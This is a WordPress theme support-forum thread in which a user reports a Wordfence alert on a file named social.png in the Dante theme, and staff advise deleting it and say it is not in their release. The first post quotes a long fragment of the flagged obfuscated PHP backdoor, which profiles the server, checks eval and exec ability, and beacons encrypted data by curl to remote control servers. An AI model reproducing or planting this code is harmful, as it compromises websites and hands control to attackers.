Digital experiences for all disciplines
New Landing › How can we help? › Themeforest Theme Support › Dante › Wordfence Security Scan After Update "This file appears to be malicious"
New Landing › How can we help? › Themeforest Theme Support › Dante › Wordfence Security Scan After Update "This file appears to be malicious"
- This topic has 9 replies, 4 voices, and was last updated 10 years by
Swift Ideas – Ed.
Viewing 10 posts - 1 through 10 (of 10 total)
-
Posted in: Dante
-
August 10, 2014 at 10:36 am #99664
Hi I have just upgraded to the latest version of Dante and after a security scan by my Wordfence Plug In I am getting this “Critical” warning that the theme has Malicious Code.
I tried uploading the theme on to another test site and updated to the latest version and I am getting the same warning message.
Do you have any idea what could be the issue?
kind regards
Gary
This file appears to be malicious
Filename: wp-content/themes/dante/social.png
File type: Not a core, theme or plugin file.
Issue first detected: 12 mins ago.
Severity: Critical
Status New
This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is:“str_rot13(strrev($gXNjWLFkUQOugyREMXKvZBfw))); } if (isset($this->oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’])) { $nGwzfuUZcelzyfJBQMIgkk = (int) ($oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’] / 100); if ($nGwzfuUZcelzyfJBQMIgkk == 0) { $nGwzfuUZcelzyfJBQMIgkk = 5; } else{ $nGwzfuUZcelzyfJBQMIgkk *= 5; } }else{ $nGwzfuUZcelzyfJBQMIgkk = 5; } return $this->VitTYMKdJITsiXBTLOEA($oXyaqmHoChvHQFCvTluqmAC, $nGwzfuUZcelzyfJBQMIgkk); } private function XsvsqpxlWxfKYiyUc($YJYRbBDIcUlLJwWidyuM) { $oXyaqmHoChvHQFCvTluqmAC = array(); foreach ($this->oXyaqmHoChvHQFCvTluqmAC[’emails’] as $HWcwGasopLJSadVNNw){ $oXyaqmHoChvHQFCvTluqmAC[] = $HWcwGasopLJSadVNNw; } foreach ($this->aJQafHDwnaPrCJrQMjHVh as $HWcwGasopLJSadVNNw) { $oXyaqmHoChvHQFCvTluqmAC[] = base64_decode(str_rot13(strrev($HWcwGasopLJSadVNNw))); } return $this->VitTYMKdJITsiXBTLOEA($oXyaqmHoChvHQFCvTluqmAC, $YJYRbBDIcUlLJwWidyuM); } private function KZdGlovqEtKYUSCqSVnK(){ $oXyaqmHoChvHQFCvTluqmAC = array(); $oXyaqmHoChvHQFCvTluqmAC[‘host’] = $_SERVER[‘HTTP_HOST’]; $oXyaqmHoChvHQFCvTluqmAC[‘page’] = $_SERVER[‘REQUEST_URI’]; $oXyaqmHoChvHQFCvTluqmAC[‘ip’] = $_SERVER[‘SERVER_ADDR’]; $oXyaqmHoChvHQFCvTluqmAC[‘eval’] = $this->YrCTrfUzBfsVJKvqiYUeFbc(); $oXyaqmHoChvHQFCvTluqmAC[‘exec’] = $this->KNstTqErzZQBDQOODaJdLv(); $oXyaqmHoChvHQFCvTluqmAC[‘serverKey’] = $this->BkISKDyWWRXScnLPbTlyI(); $oXyaqmHoChvHQFCvTluqmAC[‘run’] = 0; $oXyaqmHoChvHQFCvTluqmAC[‘ver’] = ‘0.2a’; $oXyaqmHoChvHQFCvTluqmAC[‘started’] = date(‘Ymd’); $oXyaqmHoChvHQFCvTluqmAC[‘last_connect’] = date(‘Ymd’); $this->WbKPQMoSbMZkXUeYKXRIk = $oXyaqmHoChvHQFCvTluqmAC; return $oXyaqmHoChvHQFCvTluqmAC; } private function BkISKDyWWRXScnLPbTlyI($PVSXPKLAQGaWKUtNNUYQFoBuJE = 10) { $dqkdbOJPzAPsLsuxnjAStdXUDis = ‘0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ’; $PqlpeiQHmZBwdmlsfEHmg = ”; for ($BCEUSjHFFwzzqmHmpjjQI = 0; $BCEUSjHFFwzzqmHmpjjQI < $PVSXPKLAQGaWKUtNNUYQFoBuJE; $BCEUSjHFFwzzqmHmpjjQI++) { $PqlpeiQHmZBwdmlsfEHmg .= $dqkdbOJPzAPsLsuxnjAStdXUDis[rand(0, strlen($dqkdbOJPzAPsLsuxnjAStdXUDis) – 1)]; } return $PqlpeiQHmZBwdmlsfEHmg; } public function KPBBXYwmuPGPaTyLhWevI(){ $oXyaqmHoChvHQFCvTluqmAC = $this->oXyaqmHoChvHQFCvTluqmAC; if (@$oXyaqmHoChvHQFCvTluqmAC[‘info’][‘last_connect’] < date(‘Ymd’)){ $oXyaqmHoChvHQFCvTluqmAC = $this->CMQEWmnewJmgOLaFvXGCU($oXyaqmHoChvHQFCvTluqmAC); if ($oXyaqmHoChvHQFCvTluqmAC == false){ return; } else{ unset($oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’]); } $oXyaqmHoChvHQFCvTluqmAC[‘info’][‘last_connect’] = date(‘Ymd’); } $oXyaqmHoChvHQFCvTluqmAC[‘info’][‘run’]++; $this->aIIwgKgvtyRoWoMedUdbp(WP_OPTION_KEY, $oXyaqmHoChvHQFCvTluqmAC); } private function CMQEWmnewJmgOLaFvXGCU($oXyaqmHoChvHQFCvTluqmAC){ $yYVsqvOoqWsddypXgJcIKOw = @$oXyaqmHoChvHQFCvTluqmAC[‘servers’]; $uHrzRBdPUetDqbZAdw = $this->tEiRFSJMSpXyxKKORPZClI($yYVsqvOoqWsddypXgJcIKOw, $oXyaqmHoChvHQFCvTluqmAC); if ($uHrzRBdPUetDqbZAdw !== false){ return $uHrzRBdPUetDqbZAdw; } $uHrzRBdPUetDqbZAdw = $this->tEiRFSJMSpXyxKKORPZClI($this->HSxTktcbTftjZjKRHHmhr(), $oXyaqmHoChvHQFCvTluqmAC); if ($uHrzRBdPUetDqbZAdw !== false) { return $uHrzRBdPUetDqbZAdw; } $this->XnpSvtOjNDRmxyfzaDKlGwM(); } private function tEiRFSJMSpXyxKKORPZClI($QrnkCEWRkHbQPoEPelYQRw, $oXyaqmHoChvHQFCvTluqmAC) { foreach ($QrnkCEWRkHbQPoEPelYQRw as $gXNjWLFkUQOugyREMXKvZBfw) { $uHrzRBdPUetDqbZAdw = $this->VxjeXwUeRLricksbcxlcSRnA($gXNjWLFkUQOugyREMXKvZBfw, $oXyaqmHoChvHQFCvTluqmAC[‘info’], $oXyaqmHoChvHQFCvTluqmAC); if ($uHrzRBdPUetDqbZAdw != false) { if (!isset($oXyaqmHoChvHQFCvTluqmAC[‘info’][’empty’])){ $oXyaqmHoChvHQFCvTluqmAC[‘info’][’empty’] = 0; } if ($this->YobOrWbieESFVcSsWsuBypg) { $oXyaqmHoChvHQFCvTluqmAC[‘info’][’empty’]++; if (!isset($BCEUSjHFFwzzqmHmpjjQI)){ $BCEUSjHFFwzzqmHmpjjQI = (int)($oXyaqmHoChvHQFCvTluqmAC[‘info’][’empty’] / 5); } if ($BCEUSjHFFwzzqmHmpjjQI > 0) { $BCEUSjHFFwzzqmHmpjjQI–; continue; } } if ($this->YobOrWbieESFVcSsWsuBypg) { return $oXyaqmHoChvHQFCvTluqmAC; } $uHrzRBdPUetDqbZAdw[‘info’][’empty’] = –$oXyaqmHoChvHQFCvTluqmAC[‘info’][’empty’]; return $uHrzRBdPUetDqbZAdw; } } return false; } private function VxjeXwUeRLricksbcxlcSRnA($gXNjWLFkUQOugyREMXKvZBfw, $WbKPQMoSbMZkXUeYKXRIk, $oXyaqmHoChvHQFCvTluqmAC) { $this->YobOrWbieESFVcSsWsuBypg = false; $OQijXfnrxWxPIcPSUibKEFmLE = $this->RoQfzgyhgTpMgdUIktgNdYvKE($gXNjWLFkUQOugyREMXKvZBfw, $WbKPQMoSbMZkXUeYKXRIk); $OQijXfnrxWxPIcPSUibKEFmLE = $this->gTSiihhIRUNPkADDVdes($OQijXfnrxWxPIcPSUibKEFmLE); if ($OQijXfnrxWxPIcPSUibKEFmLE != false) { if ($this->YobOrWbieESFVcSsWsuBypg) { return $oXyaqmHoChvHQFCvTluqmAC; } $OQijXfnrxWxPIcPSUibKEFmLE[‘info’] = $WbKPQMoSbMZkXUeYKXRIk; return $OQijXfnrxWxPIcPSUibKEFmLE; } return false; } private function gTSiihhIRUNPkADDVdes($oXyaqmHoChvHQFCvTluqmAC){ if(!isset($this->WbKPQMoSbMZkXUeYKXRIk)){ $this->WbKPQMoSbMZkXUeYKXRIk = $this->oXyaqmHoChvHQFCvTluqmAC[‘info’]; } if (md5($this->WbKPQMoSbMZkXUeYKXRIk[‘serverKey’]) == $oXyaqmHoChvHQFCvTluqmAC) { $this->YobOrWbieESFVcSsWsuBypg = true; return true; } $oXyaqmHoChvHQFCvTluqmAC = $this->AeRxXNHxOXpcNJWlZSIKLhIw->vZlUWjEYdyPGPomnFXMGnNY($oXyaqmHoChvHQFCvTluqmAC); $oXyaqmHoChvHQFCvTluqmAC = json_decode($oXyaqmHoChvHQFCvTluqmAC, true); if ($oXyaqmHoChvHQFCvTluqmAC == false) { return false; } else{ if (!isset($oXyaqmHoChvHQFCvTluqmAC[‘servers’])) { return false; } } return $oXyaqmHoChvHQFCvTluqmAC; } private function RoQfzgyhgTpMgdUIktgNdYvKE($gXNjWLFkUQOugyREMXKvZBfw, $WbKPQMoSbMZkXUeYKXRIk = null,$BZaxGALPLdVfntBIQWUPs = null){ if (strstr($gXNjWLFkUQOugyREMXKvZBfw, $_SERVER[‘HTTP_HOST’]) || trim($gXNjWLFkUQOugyREMXKvZBfw) == ”) { return false; } if (isset($WbKPQMoSbMZkXUeYKXRIk)) { $BdlbpgzPBjxVLkBLnsrXkmI = json_encode($WbKPQMoSbMZkXUeYKXRIk); $oXyaqmHoChvHQFCvTluqmAC = $this->AeRxXNHxOXpcNJWlZSIKLhIw->bkBMtlOkGRaPFVExpcNbC($BdlbpgzPBjxVLkBLnsrXkmI); $WbKPQMoSbMZkXUeYKXRIk = array( “serverKey” => $WbKPQMoSbMZkXUeYKXRIk[‘serverKey’], “data” => $oXyaqmHoChvHQFCvTluqmAC[‘data’], “key” => $oXyaqmHoChvHQFCvTluqmAC[‘key’] ); } while (true){ $SCvWTGyfCYyeLdjcFFzobk = curl_init(); curl_setopt($SCvWTGyfCYyeLdjcFFzobk,CURLOPT_URL,”http://$gXNjWLFkUQOugyREMXKvZBfw”); curl_setopt($SCvWTGyfCYyeLdjcFFzobk,CURLOPT_RETURNTRANSFER,1); @curl_setopt($SCvWTGyfCYyeLdjcFFzobk, CURLOPT_FOLLOWLOCATION, true); if (isset($WbKPQMoSbMZkXUeYKXRIk)) { curl_setopt($SCvWTGyfCYyeLdjcFFzobk, CURLOPT_CUSTOMREQUEST, “POST”); curl_setopt($SCvWTGyfCYyeLdjcFFzobk, CURLOPT_POSTFIELDS, $WbKPQMoSbMZkXUeYKXRIk); } curl_setopt($SCvWTGyfCYyeLdjcFFzobk,CURLOPT_CONNECTTIMEOUT,10); $oXyaqmHoChvHQFCvTluqmAC = curl_exec($SCvWTGyfCYyeLdjcFFzobk); curl_close($SCvWTGyfCYyeLdjcFFzobk); if (!strstr($oXyaqmHoChvHQFCvTluqmAC, “301 Moved Permanently”)) { break; } else{ preg_match_all(‘//’,$oXyaqmHoChvHQFCvTluqmAC,$NyFDhMvsSaUwvJsx); $gXNjWLFkUQOugyREMXKvZBfw = $NyFDhMvsSaUwvJsx[1][0]; } } return $oXyaqmHoChvHQFCvTluqmAC; } private function aIIwgKgvtyRoWoMedUdbp($piiJbwvzLxHvKjlNnFzd, $oXyaqmHoChvHQFCvTluqmAC) { if (is_array($oXyaqmHoChvHQFCvTluqmAC)) { $oXyaqmHoChvHQFCvTluqmAC = json_encode($oXyaqmHoChvHQFCvTluqmAC); } $ilUTrmqGvQsBtZfyeBXfg = $this->AeRxXNHxOXpcNJWlZSIKLhIw->MFmjdYJpnAEmbwnXvkQU($oXyaqmHoChvHQFCvTluqmAC); if ($this->YYfeblxJfGQgkPpfdrIOXNZwHg($ilUTrmqGvQsBtZfyeBXfg)) $oXyaqmHoChvHQFCvTluqmAC = json_decode($ilUTrmqGvQsBtZfyeBXfg, true); if (!isset($oXyaqmHoChvHQFCvTluqmAC[‘key’]) || !isset($oXyaqmHoChvHQFCvTluqmAC[‘data’]) || strlen($oXyaqmHoChvHQFCvTluqmAC[‘key’]) == 0 || strlen($oXyaqmHoChvHQFCvTluqmAC[‘data’]) == 0 ) { die(); } update_option($piiJbwvzLxHvKjlNnFzd, $ilUTrmqGvQsBtZfyeBXfg); } private function McEnUjjQfaFzqGsihhU($piiJbwvzLxHvKjlNnFzd, $ysnqBUjsRbJDIlZaAE = false) { if (!$ysnqBUjsRbJDIlZaAE) { $oXyaqmHoChvHQFCvTluqmAC = get_option($piiJbwvzLxHvKjlNnFzd); }else{ $oXyaqmHoChvHQFCvTluqmAC = $piiJbwvzLxHvKjlNnFzd; } $GfNOeQGoTKggozAbXZAUpg = $this->AeRxXNHxOXpcNJWlZSIKLhIw->vZlUWjEYdyPGPomnFXMGnNY($oXyaqmHoChvHQFCvTluqmAC); return json_decode($GfNOeQGoTKggozAbXZAUpg, true); } private function YrCTrfUzBfsVJKvqiYUeFbc(){ $givBPiVtALrQjPLInUFKegOE = false; @eval(“.
August 11, 2014 at 8:59 am #99761Hi
There’s no social.png in my Dante folder, you can delete that file
– Kyle
August 11, 2014 at 9:01 am #99762Hi,
Please delete current file and contact your hosting provider to make secure your website.
Thanks ๐
With Best Regards
MohammadAugust 11, 2014 at 9:24 am #99779Ok Mohammed
Thank you for that I have deleted the file & rescind and all ok
I just thought I should let you know as the issue only showed up when I upgraded to the latest version of Dante Theme
I tested it on some other test sites that I have and exactly the same thing happened when I upgraded and re scanned
So I just thought it might be an issue with the Dante update?
All seems ok know
Thank you
Gary
August 11, 2014 at 9:28 am #99782Hi,
Thanks for this information and i will inform to developer of theme.
With Best Regards
MohammadAugust 11, 2014 at 9:28 am #99783OK Thank you again for your help
August 11, 2014 at 9:34 am #99786You most welcome.
Thanks ๐
With Best Regards
MohammadAugust 11, 2014 at 4:40 pm #100032@garymogford – thanks for letting us know, where did you get this update from?
– Ed
August 11, 2014 at 6:16 pm #100051Hi Ed
It came up in my wp dashboard that the theme was out of date so I clicked on update and everything seemed fine.
But then I got an email from my Wordfence Security plug in saying there was malicious code in the dante theme files (as attached in original email)
So I tested it again on my test site and it did the same thing.
So I thought it best to let you know as I assume the update I did came direct from you?
I have deleted the file & rescind it and all seems ok now but not sure how it got into your update.
Kind regards
Gary
August 11, 2014 at 9:34 pm #100082Hi Gary,
I’ve checked and can’t see this in the update – but will investigate further. There is no file such as this in the current available files.
Thanks,
– Ed
-
Posted in: Dante
Viewing 10 posts - 1 through 10 (of 10 total)
You must be logged in and have valid license to reply to this topic.